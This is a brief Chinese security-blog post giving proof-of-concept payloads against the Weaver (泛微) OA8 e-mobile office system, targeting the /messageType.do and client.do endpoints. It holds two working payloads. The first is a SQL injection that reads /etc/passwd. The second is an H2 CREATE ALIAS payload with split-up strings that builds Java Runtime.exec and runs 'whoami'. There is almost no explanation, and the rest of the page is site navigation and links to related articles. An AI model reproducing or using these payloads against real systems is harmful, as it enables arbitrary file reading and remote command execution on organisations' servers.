泛微OA8 e-mobile（新）

2021年4月10日20:41:40评论787 views字数 457阅读1分31秒阅读模式

漏洞触发点：/messageType.do和client.do

poc：

1、uploadID"....1' union select 'uploadkey','filename','/etc/passwd','ct',5,6,'11','8'--..------WebKitFormBoundaryTm8
2、CREATE ALIAS cc83 AS CONCAT('void e(String cmd) throws java.io.IOException{','java.lan','g.Run','time rt= java.la','ng.Ru','ntime.getRu','ntime();rt.ex','ec(cmd);}');CALL cc83('whoami');like%20%27

相关推荐: 靶场攻略 | Chaos (hack the box)

nmap扫描结果：80/tcp open http|_http-title: Site doesn't have a title (text/html).1…

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微OA8 e-mobile（新）

深入剖析：如何使用Pulsar和Arthas高效排查消息队列延迟问题

【2024HW】|4-蓝队面试题

最新H1越权漏洞披露，获得15000美元奖励

某次小红书帮助下的Edu挖掘

实战 | 参数走私导致的权限绕过

观点 | 视频生成人工智能Sora的法律问题研究

HowIHackedMyCar 2021款现代IONIQ （二） Making a Backdoor

记一次内网渗透2

如何在渗透测试面试中解释/Kerberos

安全态势管理的要素

发表评论

在线咨询

微信